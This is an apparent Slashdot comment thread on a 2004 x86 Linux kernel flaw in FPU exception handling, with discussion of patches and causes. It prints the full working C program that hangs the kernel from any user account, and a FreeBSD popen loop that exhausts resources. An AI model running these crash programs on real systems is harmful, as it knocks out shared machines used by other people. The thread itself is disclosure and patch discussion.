New Linux Kernel Crash-Exploit discovered
Ant writes "According to a linuxreviews article of 6/11/2004, there is a nasty bug that lets a simple C program crash the kernel (2.4.18-2.6.x reported so far), effectively locking the whole system. It affects both 2.4.2x and 2.6.x kernels on the x86 architecture. The exploit can be compiled and run with shell access alone; root access is not needed. Detailed information and source code are given." You need to have shell access to run this program; it's also worth noting that not *all* flavors are vulnerable. Please read the article for the full details.
There are good and bad sides to this; however, the information is readily available. There are patches that "work", even before a full explanation is available. Now thousands of people are actively working on a solution, if they so choose. If they don't choose, they can use the proprietary-code method: wait for the official vendors to release a patch.
In proprietary land, a vendor would first sue the person who released the information. Then would come the reiteration that you won't be vulnerable if you use a "properly configured firewall," and then they'd start working on a fix.
Kinetic stupidity has a new brand leader: Allen Zadr.
It doesn't require external programs in order to crash.
Gnusay -- for all your talking gnu needs.
is to buy a mac and run yellow dog on it!
/ducks
you want us to "read" the article and not jump headfirst into an open source vs. closed source flamewar??? :P
#include <stdio.h>
int main(void)
{
    printf("I love Windows\n");
    return (0);
}
Gentlemen, the time has come for a serious discussion on whether or not to continue using C for serious programming projects. As I will explain, I feel that C needs to be retired, much the same way that Fortran, Cobol and Perl have been. Furthermore, allow me to be so bold as to suggest a superior replacement to this outdated language.
To give you a little background on this subject, I was recently asked to develop a client/server project on a Unix platform for a Fortune 500 company. While I've never coded in C before, I have coded in VB for fifteen years and in Java for over ten, and I was stunned to see how poorly C fared compared to these two, more low-level languages.
C's biggest difficulty, as we all know, is the fact that it is by far one of the slowest languages in existence, especially when compared to more modern languages such as Java and C#. Although the reasons for this are varied, the main reason seems to be the way C requires a programmer to laboriously work with chunks of memory.
Requiring a programmer to manipulate blocks of memory is a tedious way to program. This was satisfactory back in the early days of coding, but then again, so were punchcards. By using what are called "pointers" a C programmer is basically requiring the computer to do three sets of work rather than one. The first time requires the computer to duplicate whatever is stored in the memory space "pointed to" by the pointer. The second time requires it to perform the needed operation on this space. Finally the computer must delete the duplicate set and set the values of the original accordingly.
Clearly this is a horrendous use of resources and the chief reason why C is so slow. When one looks at a more modern (and a more serious) programming language like Java, C# or - even better - Visual Basic that lacks such archaic coding styles, one will also note a serious speed increase over C.
So what does this mean for the programming community? I think clearly that C needs to be abandoned. There are two candidates that would be a suitable replacement for it. Those are Java and Visual Basic.
Having programmed in both for many years, I believe that VB has the edge. Not only is it slightly faster than Java, it's also much easier to code in. I found C to be confusing, frightening and intimidating with its non-GUI-based coding style. Furthermore, I like to see the source code of the projects I work with. Java's source seems to be under the monopolistic thumb of Sun much the way that GCC is obscured from us by the marketing people at the FSF. Microsoft's "shared source" under which Visual Basic is released definitely seems to be the most fair and reasonable of all the licenses in existence, with none of the harsh restrictions of the BSD license. It also lacks the GPL's requirement that anything coded with its tools becomes property of the FSF.
I hope to see a switch from C to VB very soon. I've already spoken with various luminaries in the C coding world and most are eager to begin to transition. Having just gotten off the phone with Mr. Alan Cox, I can say that he is quite thrilled with the speed increases that will occur when the Linux kernel is completely rewritten in Visual Basic. Richard Stallman plans to support this, and hopes that the great Swede himself, Linux Torvaldis, won't object to renaming Linux to VB/Linux. Although not a C coder himself, I'm told that Slashdot's very own Admiral Taco will support this on his web site. Finally, Dennis Ritchie is excited about the switch!
Thank you for your time. Happy coding.
Let's just hope they're not browsing for pr0n.
"Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged)."
Hope you all had a great weekend!
Is it out already? If not, I hope they tell us promptly. I want to apply the patch as soon as I can.
x86, oh yes, I'm pro.
here's a direct link to the patch.
;)
not whoring.
That must be the new-fangled counting system, is it?
Something like hex, only it's got the whole alphabet in it, which makes it fun to use on calculators, making it easier to say "BOOBIES".
x86, oh yes, I'm pro.
... that if you trigger a floating point exception inside a signal handler (specifically SIGALRM), the kernel doesn't handle it correctly, hanging the system. It appears to affect both SMP and UP kernels.
Some questions I have to those who may have been following this:
Does the crash occur without the syscalls in the signal handler/main process?
Does the crash occur on SMP machines?
Does the crash occur with other signals (PIPE, USR1, etc.)?
Does the crash occur on ppc, sparc, etc?
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Visual Basic better than C? Surely you're smoking Crack.
#include
./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernel versions die when evil is executed.
The patch (signal.c-2.4.21.patch.txt) is tested and works for kernel 2.4.21 (vanilla). The 2.4.25 tree with the Gentoo patchset applied identifies itself as "EXTRAVERSION = -rc3-gentoo".
#include <signal.h>
#include <sys/time.h>
#include <unistd.h>

/* SIGALRM handler: saves and restores the x87 FPU state around a write().
   The fsave/frstor pair is what re-arms the pending FPU exception state
   that the kernel fails to handle on return from the handler. */
static void Handler(int ignore)
{
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;
    signal(SIGALRM, Handler);
    /* Fire SIGALRM every 100 microseconds so the handler runs constantly. */
    spec.it_interval.tv_sec = 0;
    spec.it_interval.tv_usec = 100;
    spec.it_value.tv_sec = 0;
    spec.it_value.tv_usec = 100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while (1)
        write(1, ".", 1);
    return 0;
}
Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (this is illegal in most parts of the world and strongly discouraged).
This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.
Check your own system yourself if you are wondering if this affects you. Better safe than sorry. Assume it will crash, sync (even unmount) your file systems before testing. If your system is a production server with 1000 on line users then do not test this code on that box.
How to protect yourself
The last days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil &&
The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.
Patch for 2.4.2x (vanilla) Kernels
Stian Skjelstad mailed me a working patch for 2.4 kernels.
2.4.26
I applied it, confirmed that it works with the vanilla 2.4.26 kernel and made a diff (diff -ur linux-2.4.26/kernel/signal.c linux-2.4.26-x/kernel/signal.c > signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
5. Apply the patch
* patch -p1 -d
1. Get a vanilla 2.4.21 kernel and install it.
2. Apply the patch
* patch -p1 -d
I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.
This kernel can be used on any Linux system. It does not require any Gentoo-only tools.
1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
* wget http://re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd
* tar xfvj linux-2.4.25.tar.bz2
5. Apply the Gentoo patchset:
* patch -p1 -d
8. Configure your kernel
* Using your old config: cp
Wheel of Time: Book by Book and Sumview (summary review) Bigdady92 style: http://bigdady92.blogspot.com/
How many systems deployed in real-world environments give anyone other than IT staff shell access?
DeviantArt Page
It's called Base64.
...having programmed in VB for the last 8 years doing kernel level programming...
I think you'll need to clarify that for us slashdot folk.
It must be an exploit in the SCO code that is in the Linux kernel!
;)
... It's ok. remember, not many people know about this yet. ...... ......
Oh God! How do I update Fedora Core 2!!!!
May the Maths Be with you!
Well, those who have been paying attention know that Linux has had quite a few (read: way too many) critical bugs in the past year. Most of them were related to do_mremap (how many times do they have to "fix" that until it's fixed?!), varying in severity from DoS to local root exploits. How many has the Windows kernel had in the last 12 months? I am afraid that this comparison might fall out to the advantage of Windows. Until you take into account time to fix, maybe. Off to patch my systems...
Please correct me if I got my facts wrong.
I thought Monday's were supposed to be Windows patch days, Tuesdays were for Linux, Wednesday was Apache, Thursday was Windows again, Friday was SSH...
The article says it affects x86 (and x86-64) only.
So itanium, ppc, etc. are safe. But my other questions still remain.
Note that the person who reported the bug thought he was triggering a gcc bug. As it turns out, he munged his FPU assembly instructions.
The GCC people rightly told him to contact the lkml... it's definitely an exception handling issue.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
go to the trouble to get a paid for shell account at a provider, or a freebie I guess, then run this script, just to destroy their own account basically?
Or is the bigger danger that this script would be the payload included within some Linux worm?
Just wondering what this means for joe average home linux user who isn't running a server.
Since when did Linux run VB programs without Wine? If so, I missed that news flash.
x86, oh yes, I'm pro.
Your sysadmin needs this advice:
If your system is a production server with 1000 on line users then do not test this code on that box.
No, it's not because C is being used here. It's because assembly is being included in the program. If you weren't able to compile the inline assembly, you wouldn't be able to compile this program on a specific system. Plus, you can just create a raw ELF binary that has this assembly instruction in it (if you knew all the opcodes, etc.) and crash a system. This has nothing to do with the language that is being used.
...not to mention the fact that the Linux kernel itself lacks any support for any type of journaled filesystem, memory protection, SMP support, etc...
I think I just got 0wn3d.
I'm going to go back to lurking now.
And fixes will be deployed within hours.
The same cannot be said of many proprietary OSes...
The fact that a patch is available doesn't mean that it is a non-issue. In many cases system administrators are too busy or lazy, or do not wish to interrupt services, to update their systems to fix these software vulnerabilities. The proprietary vs. non-proprietary argument is irrelevant if administrators fail to keep up-to-date with security fixes. A good example of this was the SQL Slammer worm, which made its rounds several months after a patch that fixed its attack vector was released.
Simply put, the bigger problem is with the wet-ware than the development methodology.
Yet another reason why there are alternatives to Linux...
Both RHEL 2.1 (2.4.9-e40) and RHEL 3 (2.4.21-15) are vulnerable, which means that Red Hat back-ported this bug into their 2.1 product line. Nice!
Bus error in your favour. Collect 200kB
This can be executed on any webhost with ftp access and a cgi-bin.
Slashdot blurb about Windows bug
Linux trolls: Windows sucks!!!
Slashdot blurb about Linux bug
Linux trolls: Windows sucks!!!
Martin
If your system is a production server with 1000 on line users then do not test this code on that box
Mwahahahahah!!! They can't be serious! Ok, I vill test evil.c on some other boxen...
With that aggravating beauty, Lulu Walls.
In the real world, where I work, I run a Hybrid network where I'm still waiting for Windows XP Service Pack 2 to come out in a finalized form because I don't have an option to pull just the parts that I need, and SP2 RC2 is not quite ready to unleash on my network (although I have actively TESTED it). Of course, this just fixes some vulnerabilities that have existed for over a year.
Don't tell me that I, as a Windows User and Administrator, don't care. While I've ignored this kernel issue over the weekend, I get to actively compile some kernel patches and test those. I'll bet, even before my testing, that I'll be able to have a production solution by tomorrow. Even if SP2 releases this afternoon, I'll still have to test it before deployment, so the Linux solution will be in production first.
Kinetic stupidity has a new brand leader: Allen Zadr.
FTFA (From The Fine Article):
``This doesn't affect NetBSD Stable.''
The exploit code also doesn't work on Windows 95, nor on Menuet. I haven't tested SkyOS, because I don't have a license.
Please correct me if I got my facts wrong.
Here is the LKML discussion thread on the subject. It's an interesting bug, briefly summarised by Matt Mackall as follows:
So there's a bit of a massive problem with FPU exception handling, which didn't come to light before. Wheee. Fun.
Gee, based on what /.'rs are always posting, I thought Linux could run forever and was uber-invulnerable...
This makes me respect Windows-crashing apps a little more (or less, depending on how you look at it), in that people can crash Windows w/o benefit of the source code! It's really amazing.
I myself program in a variety of languages, and while each may have its uses, I'm afraid I can't agree with your assessment. I generally use C++ over C most of the time, but I would certainly stick with C over VB (and yes, I do program in VB as well, when the occasion requires). Just because a language has an impressive GUI does not make it more valid. In fact, it can often increase the chances that a programmer is churning out code without truly understanding all that it's doing. Just my two cents, of course.
I think this is a joke but with the amount of idiots out there it's hard to be certain.
I know this is a cut and paste troll, but for best effect use 'PERL' instead of 'Perl' or 'perl', makes you sound even more like you are talking out of your ass.
Thanks!
You have a superb feeling about this level!
You sense the presence of monsters!
######
#...@+TTTTTTTTTTTTTTTTTTT
#....#
######
You hear a door burst open!
You die (more)
Don't get me wrong, I enjoy Linux, but keep in mind, the article is 3 days old.
Also, how will I be able to apply the patch, and where is it? Do I have to recompile my kernel?
If this were a Windows bug, it would have been thoroughly exploited, made the news, and I would have already applied the patch by clicking "Windows Update". A bigger deal would have been made of it, but it would have only taken about a minute of my time.
I do prefer Linux, but we need to be open-minded.
I ran this code on "2.6.5-gentoo-r1 #4 SMP Thu May 27 19:12:27 GMT 2004 i686 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux" and although it didn't crash, gnome started acting all odd, and none of the terminals were responsive. They just kept printing out the prompt. Still, I could browse slashdot while the code was running, and could run some applications. Although when I went to open another terminal it opened 6.
Very vital question for the UML virtual server leasing cottage industry and the customers of same.
If this were to be run on a UML session, what would happen? Would the damage be limited to that UML session, or would the host machine go down?
FYI... My RH7.3 with gcc 2.96 and a 2.4.20 kernel is also vulnerable.
He, who dies with the most toys, wins
How do we blame Micro$oft for this?
As for this bug, don't start bashing Linux left and right. Linux isn't perfect, no software is. But unlike when there is a bug in windows a fix is on the way as fast as possible. In fact, there is a patch on the site right now! And for you zealots who say stuff like "No big deal, who is going to do that? No the kind of person you give shell access to." shut up. Admit that Linux is not the perfection in computing.
You know what else makes the kernel crash? At least if you are using 2.6.5 or higher if you enable APIC/APIC-IO and you have an nforce chipset the system will lock up as soon as you do too much I/O.
I'm not sure you understand what motivates the average hacker/geek. Chances are this gets fixed by some guy who is simply trying to get his favourite porn site back up!
People couldn't type. We realized: Death would eventually take care of this.
lol!
I must remember to browse at -1 more often.
73 replies, and as far as I can see nobody has yet said it, so I will:
This ONLY crashes Linux on x86 (or x86-64) systems. Every other architecture is unaffected.
Well it is Microsoft's fault for saying that IE and such are part of the OS, but Windows has had very few kernel exploits in the most recent few years; it is mostly IE holes and, prior to IIS 6, IIS holes.
This was made worse by the fact that many people run as admin and IIS used to run as LocalSystem on default installs.
However, all software has bugs; this incident is neither proof positive nor proof negative of any argument re: open source vs closed source.
Natural != (nontoxic || beneficial)
The good thing about Linux patches is that they are cumulative whereas Windows likes to start over (for the most part) every couple years with a fresh, untested system. Microsoft, with all of their billions, don't even offer hackers an incentive to find bugs in a pre-release version. If they did this, their security and corporate image would be improved.
But they're a monopoly, so what do they care?
Life is the leading cause of death in America.
feh. i can do both at the same time.
Who cares about the Windows kernel when there are about 1000 other ways to gain full unmitigated access over a Windows PC. Outlook Express exploits, MSN Messenger exploits, BlackICE exploits, RPC exploits, IIS exploits, IE exploits. You can even root them en masse without even gaining initial access to the box. This Linux exploit allows you to crash the box if you have an account. What moron paying for a shell account is going to do that? Or what type of cracker is going to give himself away simply to crash the box?
Can you still outright crash NT by sending too many backspaces to the console?
It's a pity that there is no moderation like "Funny Troll +1". I'd mod you up man. "Dennis Ritchie is excited about the switch" ... pure brilliance. And VB/Linux ... so obvious when you think about it.
Hmmm. Tempted to cut and paste this into a VB newsgroup ... heh heh. I'm sure there'd be a groundswell of support. [insert evil sarcastic laugh]
Bitter and proud of it.
You think that Fortran, Cobol and Perl have been retired?
By any chance would you or anyone you know have a Citibank credit card? A fact you may not be aware of is that most of Citibank's back end is written in Cobol. Federated Insurance is another organization that has plenty of Cobol-based systems, and when last I checked, neither company has any plan to change it.
Yes, there are newer and possibly 'better' languages out there; does that make them better in all such cases? Hell no.
When speaking with a Federated representative, she proudly said that their database backend system was completely Cobol based and was faster and more efficient than anything else on the market. It took me a little while to realize that she wasn't saying that it could process a day's worth of transactions faster than anything else on the market with newer hardware; the issue was the cost of upgrading.
If you have millions of lines of code in an older language and a database system that has been in place for 20+ years... it's not easy to upgrade no matter the advantages. If you worked for such a large company, it'd be pretty easy to sell something new, but do you want to guarantee a seamless transition from one system to another? Any hiccups along the way will most likely make the transition be regretted.
Same goes for C. Yes, Java and other languages might be able to do a better job, the fact is that huge amounts of legacy code exists and needs to be supported.
Example: Linux. Written in C primarily, if I am not mistaken. How should it be fixed? Should it be ported to C++? VB? Java? C#? Such a conversion *may* be possible; however, even if it were, the potential benefits to be realized are so inconsequential compared to the cost of doing so that such an endeavor would be wasted.
Visual Basic that lacks such archaic coding styles, one will also note a serious speed increase over C.
I'd suggest you do some research on that point. Raw C/C++ tends to be a hell of a lot faster than VB. Yes, you can often create a front end in VB much faster than you can in C. I would remind you though that in C/C++ you can create far more dynamic and elegant code for your task. In fact, the advantage of C++ over VB I think can be summed up in a single word: Inheritance.
As a programmer who spends about 1/4th of his time working in embedded systems (not the niceties of XP embedded mind you, but micro controllers and other such horrors), I can tell you that VB has no place in such a world.
Hell, I'd love to see an 8051 VB compiler, just for a laugh.
Help Brendan pay off his student loans
I guess everybody missed the sarcasm.
This sig is the express property of someone.
Beware of patch.
It could be another Linux Kernel 2.4.11
No, it would not have been thoroughly exploited if it was a Windows box.
Because..... guess what, this is a multi-user bug. They need to have an account on the machine. If it was Windows, they can take root right away, which is much worse than crashing a machine.
This type of problem has never been solved on windows, and probably never will.
Does this CSRSS Bug still take down Windows XP boxes?
Baz
The article doesn't attempt to explain anything.
(Someone please correct me if I have this wrong)
After poking around in the LKML, I've mostly figured it out.
The kernel wasn't handling floating point exceptions correctly in the signal handler. The problem is that if the exception is triggered by the LAST instruction in the handler, the kernel attempts to deliver the exception to a signal context which no longer exists. The same thing was happening with execve... if you triggered it right before the execve syscall, the application context would be destroyed, and the pending exception would be pointing to a non-existent instruction. The exception handler would jump off into space trying to deliver SIGFPE...
So they changed __clear_fpu (which is called when doing an initial switch back to user space [I think]) to clear any pending FPU exceptions, because there was no way they could be handled anyway.
Missing an FPU exception doesn't sound so bad. I think someone was posting a better solution, which would attempt to handle it the right way... (I didn't really follow the more extensive patch, anyone care to explain?)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Linux has been plagued by local exploits for a long time, but you have to get on the server FIRST. Windows has a lot of exploits that happen _remotely_ and give people control of the machine. More often than not Linux exploits crash a daemon or cause a DoS but do not take down the machine itself. I'm not defending Linux, but the gravity of Windows problems is typically orders of magnitude worse than exploits on Linux. And at least with Linux you can often do damage control because they tell you what the problem is and possible workarounds; with Windows you wait until MS gives you an update, and possibly will tell you what the problem was that your servers were vulnerable to for the last month or three.
It's good reading for anybody interested, however, unlike slashdot, registration is required.
Kinetic stupidity has a new brand leader: Allen Zadr.
noob, l00s0r ... renice this process and everything is ok ;)
unless it included a time bomb aspect to it as well? Some RK with the new shiny kernel crash script might wait until such a time as the number of zombies was high enough to get the desired effect maybe. I dunno, sploits are outside my expertise, never had any desire to engage in malicious sport or exploiting for some other profit. Perhaps these dudes might use it in the irc wars or something.
A year or two ago, this simple program used to do the same for FreeBSD:
#include <stdio.h>

int main(void)
{
    FILE *f;
    /* Each popen() forks a child and opens a pipe, and nothing is ever
       pclose()d, so the loop keeps consuming processes and descriptors
       until the system gives out. */
    while (1) {
        f = popen("date", "r");
        (void)f;
    }
    return 0;
}
The good thing about Linux patches is that they are cumulative whereas Windows likes to start over (for the most part) every couple years with a fresh, untested system.
WTF? By that logic... when I install a Windows 2000 machine, in order to be completely up to date, I need to install Service Pack 1, then Service Pack 2, next onto Service Pack 3, and then Service Pack 4... and if I have time, DL all of the patches from WindowsUpdate.com, sadly... that'd be wrong.
Microsoft patches and operating systems are cumulative. Whenever XPSP2 is released, it will provide all XP bug patches up to a certain date along with its other improvements, including all of those offered in SP1.
Along the way, each bug that is patched in 2k and XP these days is also fixed in Longhorn. This is common practice at MS and has been for years.
Help Brendan pay off his student loans
(this is illegal in most parts of the world and strongly discouraged)."
I don't understand - which bit is illegal?
Taking down "lame free-shell providers"? OR
Taking down "free-shell providers" in general? OR
Providing free shells?
Anyone else getting repeatedly unsubscribed from bugtraq and the other securityfocus mailing lists? About once a month I get an email from them claiming my email was bouncing (often because their DNS was sending it to the wrong machine!). And about once a month I don't get the email, and am unsubscribed from a random list. Which really sucks, because it takes a few days to realize, and then you've lost a few days' worth of important announcements.
I'm just curious whether this is a widespread problem; since I'm fairly certain my connection isn't flaky, the problem must be at their end.
Not to criticize the open source methodology too much, but I wonder what sort of numbers we're actually talking about here. Any ideas?
2000 people would be in the ballpark of your high school population, or a large concert crowd. That's a lot of kernel hackers.
``Who cares about the Windows kernel when there are about 1000 other ways to gain full unmitigated access over a Windows PC.''
Yes, and who says these aren't present on Linux systems? Do you claim that all Linux distros have been as heavily assaulted as Windows, and kept up? I don't think so, and therefore I don't think we can say anything about the security of a Linux + libs + apps system.
Please correct me if I got my facts wrong.
Mind you, at the risk of replying to myself it is worth noting that the patch currently available actually does nothing more meaningful than checking to see if the code that got you there is this exact exploit or not... so I would expect a better patch to be coming out that actually deals with the real problem, which appears to be that some poor munchkin started to write an FPU exception handler somewhere near version 2.3 and got distracted before finishing it. I assume though that the production of such a patch implies working out what the dude actually meant to do, first.
I just hope it doesn't take too long to get a 2.6 patch out.
Karma: Segmentation fault (tried to dereference a null post)
I think you'll need to clarify that for us slashdot folk
Not even Microsoft is stupid enough to do kernels in VB... so what OS uses VB? (and this would be pre-CLR VB...)
Yeah!!!
I mean with Perl.com typing it as Perl all over the site, not to mention Larry Wall's Very Own Perl Page typing it as Perl, you'll look l33t spelling it as PERL!
For the record, I didn't read it as a troll, but as humour...
-- Andy Jeffries Scramdisk for Linux (Change the orgy to org to reply)
Oops, never mind, didn't read the whole thing ;)
use Base255 (ascii)
The article mentions "This doesn't affect NetBSD Stable." Why would a Linux kernel flaw affect any version of *BSD?
Okay, let us start with the beginning:
A) Do you have other users using your system (and I don't mean your hypothetical non-geek girlfriend)?
B) Can you trust these users not to run this kind of thing?
If (A) = Yes and (B) = No: I think you need to learn a bit more about Linux very, very urgently; being sysadmin to a "public" server is not something to undertake lightly.
In all other cases : relax, you're unlikely to get hit by this exploit at short notice. If you are running a standard distribution, check for available updates for that distro, if you are running something like Gentoo, compiling a fixed kernel shouldn't be too difficult.
In short : anyone who is truly at direct risk from this should already know enough to react appropriately. This is a *local* exploit, so script-kiddies cannot 0wn your machine using this across the internet, unless they've already broken into the machine. Even if they have, the worst they can do is crash it, they cannot give themselves elevated privileges and do any real damage.
And about the Windows "Update": If this were a Windows issue, it would probably be classed "Like, totally non-critical" and be fixed months later in a fixpack, as no remote exploit or privilege escalation is involved...
Obviously PERL is widely popular, but I think many Slashdotters would be surprised at how widely used FORTRAN and COBOL are.
Am I the only one who got this joke? Mod this guy up.
- People who believe other people have no right to live, got no right to live ...
This bug was posted on Slashdot as a comment reply to the assembly programming article a few days ago. I looked at it then and it locked up my machine nicely.
Aside from that, I don't know that your point is valid. Most linux users either know how to use patch and compile their own kernels, or can run up2date or whatever to download their latest prefab clutter. Also worth pointing out is this bug needs a shell to run the program and crash the system. If you're giving out shells and don't know how to use patch, this is the least of your worries.
The patch is linked from another comment in this thread and yes, you'll have to recompile your kernel. No one has access to my machines here but me so I'm not going to bother updating until 2.6.7 is released. Have a good one.
Also, how will I be to apply the patch and where is it? Do I have to recompile my kernel?
If you had read the article, you would know that they provide the patches right there for (I think) ever affected kernel.
A bigger deal would have been made of it, but it would have only taken about a minute of my time.
A minute of your time, a few weeks of Microsoft's time.
VB and Java faster than C? What compiler were you using?
I do prefer Linux, but we need to be open-minded.
That is in part due to the fact that Windows is more apt to having security holes that are exploited by automated virii and worms. Those don't necessarily require machine access. You can simply contract them by being on a network with your machine on. Every Windows machine will have the same hole. Becoming an administrator appears to be fairly trivial.
Linux is a bit different in that most bugs reported are due to user-enabled software. If you have a machine that you don't want exploited, you just don't enable certain slutty services. Windows enables them by default. Also, most processes in Linux run as a specific user in a chroot jail. Even if they were exploited, the exploiter can usually just corrupt data tied to that service. Doesn't mean Linux is any more secure, but it would appear that it is a little more contained when broken.
Are you intolerant of intolerant people?
Some explanation is in order - the program doesn't just kill them outright: it has two threshold levels (warn and error, both can be set at runtime). If the student uses over 90% CPU time in 20 seconds it trips an error; over 50% in 20 seconds trips a warning, for example. When either of those levels is exceeded it is logged and they get a message on their tty (if possible) telling them about it. They are also shown a log of hits when they log in. The students can exceed either level a number of times - say 10 warnings and 5 errors - after which it is killed. If students genuinely have to do very intensive processes then they can ask us to add them to an ignore list while they are doing it. I'll probably add options to renice, limit memory and other things eventually; this was a quick hack. The problem with ulimit is that it does the limiting but doesn't give the users sensible information about it - I need to give them easy-to-understand error messages about what they've done wrong.
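As an added illustration (a hypothetical re-creation, not the poster's program, which is not shown), here is a Python model of the warn/error/strike logic described above: constructed thresholds stand in for the runtime-settable ones, CPU readings are fed in by hand instead of read from /proc, and strikes are counted per user, which the post does not specify.

```python
from typing import Callable, Dict, List, Optional, Set

# Constructed thresholds standing in for the runtime-settable ones in the post:
# a 20-second sampling window, warn at 50% CPU, error at 90%,
# and a kill after 10 warnings or 5 errors.
WINDOW_SECONDS = 20.0
WARN_PCT = 50.0
ERROR_PCT = 90.0
MAX_WARNINGS = 10
MAX_ERRORS = 5


class Verdict:
    """Outcome of one sample: level is 'ok', 'warn', 'error' or 'kill'."""

    def __init__(self, user: str, pid: int, pct: float, level: str, message: str = ""):
        self.user, self.pid, self.pct, self.level, self.message = user, pid, pct, level, message


class HogMonitor:
    """Strike-based CPU-hog monitor (hypothetical; not the poster's code).

    Strikes are counted per user (an assumption).  kill_fn is called with the
    pid when the strike limit is hit; the default does nothing so the model
    runs anywhere, a real daemon would pass os.kill with SIGKILL.
    """

    def __init__(self, ignore: Optional[Set[str]] = None,
                 kill_fn: Optional[Callable[[int], None]] = None):
        self.ignore: Set[str] = set(ignore or ())   # users doing sanctioned heavy work
        self.warnings: Dict[str, int] = {}
        self.errors: Dict[str, int] = {}
        self.last_cpu: Dict[int, float] = {}        # pid -> cumulative CPU seconds
        self.killed: Set[int] = set()
        self.log: List[Verdict] = []
        self.kill_fn = kill_fn or (lambda pid: None)

    def sample(self, user: str, pid: int, cpu_seconds: float) -> Verdict:
        """Feed one window-end reading of a process's cumulative CPU time.

        A real daemon would read utime+stime from /proc/<pid>/stat every
        WINDOW_SECONDS; here the readings are supplied by the caller.
        """
        prev = self.last_cpu.get(pid)
        self.last_cpu[pid] = cpu_seconds
        if prev is None or user in self.ignore or pid in self.killed:
            return Verdict(user, pid, 0.0, "ok")   # first reading, ignored user, or already dead

        # CPU share over the window: seconds consumed divided by seconds elapsed.
        pct = max(0.0, cpu_seconds - prev) / WINDOW_SECONDS * 100.0
        if pct >= ERROR_PCT:
            level = "error"
            self.errors[user] = self.errors.get(user, 0) + 1
        elif pct >= WARN_PCT:
            level = "warn"
            self.warnings[user] = self.warnings.get(user, 0) + 1
        else:
            return Verdict(user, pid, pct, "ok")

        # The message the post says goes to the user's tty and into their login log.
        message = (f"{level.upper()}: pid {pid} used {pct:.0f}% CPU over the last "
                   f"{WINDOW_SECONDS:.0f}s (warnings {self.warnings.get(user, 0)}/{MAX_WARNINGS}, "
                   f"errors {self.errors.get(user, 0)}/{MAX_ERRORS})")
        if (self.errors.get(user, 0) >= MAX_ERRORS
                or self.warnings.get(user, 0) >= MAX_WARNINGS):
            level = "kill"
            message += "; strike limit reached, process killed"
            self.killed.add(pid)
            self.kill_fn(pid)
        verdict = Verdict(user, pid, pct, level, message)
        self.log.append(verdict)
        return verdict

    def login_report(self, user: str) -> List[str]:
        """The 'log of hits' shown to a user when they log in."""
        return [v.message for v in self.log if v.user == user]
```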
YHBT. YHL. HAND.
Actually, I was ROTFLMAO when I read the post. I guess some people take longer than others to start their sense of humor on a Monday.
It was funny, but I've seen variants of this posted several times before (I think it might even have been a KTB[1] original).
[1] I think that same guy was "kiss the blade", "lover's arrival", and "twirlip of the mists".
The clue flew by, but still sends you greetings, young master. Dig into the history books to find that FORTRAN and COBOL are properly spelled with all caps (due to case-insensitive terminals back then). The next clue will be over in 30 minutes if you still need to catch a ride.
I know this is a cut and paste troll, but for best effect use 'PERL' instead of 'Perl' or 'perl', makes you sound even more like you are talking out of your ass.
Huh? The post was clearly a joke, not a troll. And, as the name in question is an acronym for Practical Extraction and Report Language, I think PERL is a perfectly valid way of writing it, if a little old-fashioned.
I would have already applied the patch by clicking "Windows Update"
You actually apply those things? That's like OS Russian Roulette!
Linux/Open Source/Anti Microsoft News
Use `up2date -u`. I think it's also possible to use `yum` or other commands, though I'm still in the process of getting up-to-speed with Fedora 2..
God I wish I could edit posts.
The issue isn't that the context is gone... the issue is that the kernel is executing a non-waiting FPU instruction, i.e. "fwait", on returning from a context that flushes a user thread (i.e. return from signal handler, syscall after execve). This triggers the FPE, except the kernel isn't set up to handle FPEs properly from kernel space in this case. The problem is that the TS flag is set because it's switching tasks, so it receives a different exception, trap 7 (device_not_available). The purpose of that exception is to signal the kernel that a newly created process wants the FPU. So it attempts to set up the FPU... which ends up calling __clear_fpu again... heh... and the original exception isn't cleared yet... whoops.
What's really weird is I found this document, which details the potential problems of trying to use the FPU in an interrupt handler in the Linux kernel.
They brought up the potential of triggering this EXACT PROBLEM... quote "endless trap 7 activation"... only in this case they're talking about writing an interrupt routine, not returning from a signal handler. Still, they already discovered this misbehavior...
Well, you can't really call it that, though. It was sort of by design (to make task switching faster). But the thing is you have to be ABSOLUTELY SURE that you never raise an FPE when TS is set and you're NOT a user thread. That's what gets you burned here.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
You can limit all those with user limits on number of processes, CPU usage, disk quotas etc. Any machine with public shell access should have those set up. This bug is different.
